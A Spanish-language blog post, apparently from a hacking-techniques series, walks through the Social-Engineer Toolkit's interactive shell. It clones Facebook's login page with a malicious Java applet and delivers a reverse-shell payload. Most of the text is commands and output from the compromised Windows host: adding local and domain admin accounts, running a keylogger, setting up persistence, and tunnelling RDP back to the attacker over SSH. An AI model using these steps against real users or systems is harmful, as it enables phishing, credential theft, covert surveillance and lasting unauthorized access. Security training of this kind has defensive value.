Conceptos Básicos y Avanzados de SET (Social Engineer Toolkit) – Características avanzadas de SET – SET Interactive SHELL – Parte VI – Seguridad en Sistemas y Técnicas de Hacking. TheHackerWay (THW)

Se trata de una funcionalidad que permite establecer una shell interactiva con una víctima comprometida, funcionando de un modo similar a lo que una sesión meterpreter en metasploit framework. Para aplicar esta característica basta con utilizar el vector de ataque web con un applet malicioso y posteriormente seleccionar el payload correspondiente a Shell interactiva de SET como se indica a continuación

set > webattack > 2

SET supports both HTTP and HTTPS

Example: http://www.thisisafakesite.com

Enter the url to clone: http://www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php

[*] This could take a little bit…

[*] Injecting Java Applet attack into the newly cloned website.

[*] Filename obfuscation complete. Payload name is: Ipy2dMKRaC3

[*] Malicious java applet website prepped for deployment

What payload do you want to generate:

Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker

2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker

3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker

4. Windows Bind Shell Execute payload and create an accepting port on remote system

5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline

6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline

7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter

8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports

9. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

10. Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter

11. SE Toolkit Interactive Shell This is the new custom interactive reverse shell designed for SET

12. RATTE HTTP Tunneling Payload This is a security bypass payload that will tunnel all comms over HTTP

13. Import your own executable Specify a path for your own executable

La opción número 11 corresponde a la SHELL interactiva de SET.

set > payloads > 11

[-] Enter the PORT of the listener (enter for default): 8080

[*] Done, moving the payload into the action.

[*] Packing the executable and obfuscating PE file randomly, one moment.

[*] Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload…

***************************************************

Web Server Launched. Welcome to the SET Web Attack.

***************************************************

[–] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [–]

[*] Launching the SET Interactive Shell…

[*] Loaded SET core modules into SET Interactive Listener…

[*] Crypto.Cipher library is installed. AES will be used for socket communication.

[*] All communications will leverage AES 256 and randomized cipher-key exchange.

The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:8080

Como nota interesante, este tipo de consola permite que la comunicación tenga intercambio de claves seguro por medio de AES 256 utilizado para la comunicación entre ambos puntos de la conexión.

Cuando una víctima ejecuta el applet malicioso, se inicia una sesión interactiva utilizando SET

[*] Connection received from: 192.168.1.40

*** Pick the number of the shell you want ***

1: 192.168.1.40:WINDOWS

Enter your numeric choice: 1

[*] Dropping into the Social-Engineer Toolkit Interactive Shell.

set>

A partir de aquí es posible interactuar con la víctima por medio de los comandos disponibles en la shell interactiva. Para ver los comandos disponibles se ingresa el carácter “?”

set> ?

Welcome to the Social-Engineer Toolkit Help Menu.

Enter the following commands for usage:

Command: shell

Explanation: drop into a command shell

Example: shell

Command: download <path_to_file>

Explanation: downloads a file locally to the SET root directory.

Example: download C:\boot.ini or download /etc/passwd

Command: upload <path_to_file_on_attacker> <path_to_write_on_victim>

Explanation: uploads a file to the victim system

Example: upload /root/nc.exe C:\nc.exe or upload /root/backdoor.sh /root/backdoor.sh

Command: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>

Explanation: This module tunnels ports from the compromised victims machine back to your machine.

Example: ssh_tunnel publicipaddress 22 80 root complexpassword?! 80

Command: exec <command>

Explanation: Execute a command on your LOCAL ‘attacker’ machine.

Example exec ls -al

Command: ps

Explanation: List running processes on the victim machine.

Example: ps

Command: kill <pid>

Explanation: Kill a process based on process ID (number) returned from ps.

Example: kill 3143

Command: reboot now

Explanation: Reboots the remote server instantly.

Example: reboot now

Command: localadmin <username> <password>

Explanation: adds a local admin to the system

Example: localadmin bob p@55w0rd!

Command: domainadmin <username> <password>

Explanation: adds a local admin to the system

Example: domainadmin bob p@55w0rd!

Command: bypassuac <ipaddress_of_listener> <port_of_listener> <x86 or x64>

Explanation: Trigger another SET interactive shell with the UAC safe flag

Example bypassuac 172.16.32.128 443 x64

Command: grabsystem <ipaddress_of_listener> <port_of_listener>

Explanation: Uploads a new set interactive shell running as a service and as SYSTEM.

Caution: If using on Windows 7 with UAC enabled, run bypassuac first before running this.

Example: grabsystem 172.16.32.128 443

Command: keystroke_start

Explanation: Starts a keystroke logger on the victim machine. It will stop when shell exits.

Example: keystroke_start

Command: keystroke_dump

Explanation: Dumps the information from the keystroke logger. You must run keystroke_start first.

Example: keystroke_dump

Command: lockworkstation

Explanation: Will lock the victims workstation forcing them to log back in. Useful for capturing keystrokes.

Example: lockworkstation

Command: persistence <ipaddress_of_listener> <port_of_listener>

Explanation: Persistence will spawn a SET interactive shell every 30 minutes on the victim machine.

Example: persistence 172.16.32.128 443

Warning: Will not work with UAC enabled *yet*.

Command: removepersistence

Explanation: Will remove persistence from the remote victim machine.

Example: removepersistence

Como puede apreciarse en el listado de opciones disponibles, salvando un poco las distancias, sigue una filosofía muy similar a la de meterpreter de metasploit framework con un conjunto de opciones que extienden el abanico de posibilidades de un atacante a algo mas que solamente una consola de windows (o Linux). Las opciones son auto-explicativas y demuestran lo sencillo que es utilizar esta consola en SET, la ejecución de algunos de estos comandos arrojan los siguientes resultados:

set> exec pwd

/opt/set_svn

set> ps

C:\WINDOWS\Explorer.EXE PID:1456

C:\Program Files\Java\jre6\bin\jusched.exe PID:940

C:\WINDOWS\system32\taskswitch.exe PID:952

C:\WINDOWS\system32\wuauclt.exe PID:1792

C:\DOCUME~1\Owner\LOCALS~1\Temp\x8UdxzKurw.exe PID:2564

C:\DOCUME~1\Owner\LOCALS~1\Temp\x8UdxzKurw.exe PID:2572

set/command_shell>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 192.168.1.40

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.1.1

set/command_shell>net user

User accounts for \\ANONYMOUS

——————————————————————————-

Administrator ASPNET Guest

HelpAssistant Owner SUPPORT_388945a0

The command completed successfully.

set/command_shell>quit

[*] Dropping back to interactive shell…

set> domainadmin adastra password

[*] Attempting to add a user account with domain administrative permissions.

[*] User add completed. Check the system to ensure it worked correctly.

set> localadmin jdaanial jdaanial

[*] Attempting to add a user account with administrative permissions.

[*] User add completed. Check the system to ensure it worked correctly.

set> keystroke_start

[*] Keystroke logger has been started on the victim machine

set> keystroke_dump

keys pulsed here!!!

Una característica interesante de este tipo de consola esta en la capacidad de crear túneles SSH entre la maquina del atacante y la maquina comprometida, así es posible crear otros puntos de acceso que le permitirán al atacante intentar comprometer otros servicios sobre la maquina comprometida o cualquier otra en el segmento de red de la víctima.

set> ssh_tunnel 192.168.1.33 22 3389 root clave 3389

[*] Telling the victim machine we are switching to SSH tunnel mode..

[*] Acknowledged the server supports SSH tunneling..

[*] Tunnel is establishing, check IP Address: 192.168.1.33 on port: 3389

[*] As an example if tunneling RDP you would rdesktop localhost 3389

Desde la maquina del atacante (192.168.1.33) se podrá apreciar como el puerto 3389 se encuentra esperando conexiones

>netstat -ano | grep 3389

tcp 0 0 0.0.0.0:3389 0.0.0.0:* LISTEN off (0.00/0/0)

tcp6 0 0 :::3389 :::* LISTEN off (0.00/0/0)

Tal como se indica en el mensaje posterior a la creación del tunel SSH, un uso practico de esta característica puede ser activar escritorio remoto sobre la maquina comprometida por medio del uso del “rdesktop”. En el caso de que no se encuentre instalado utilizar el comando apt-get de Debian y derivados

>apt-get install rdesktop

Si ya se encuentra instalado simplemente con ejecutar el siguiente comando en la maquina del atacante:

>rdesktop localhost

Será suficiente para establecer una sesión de escritorio remoto con la maquina comprometida.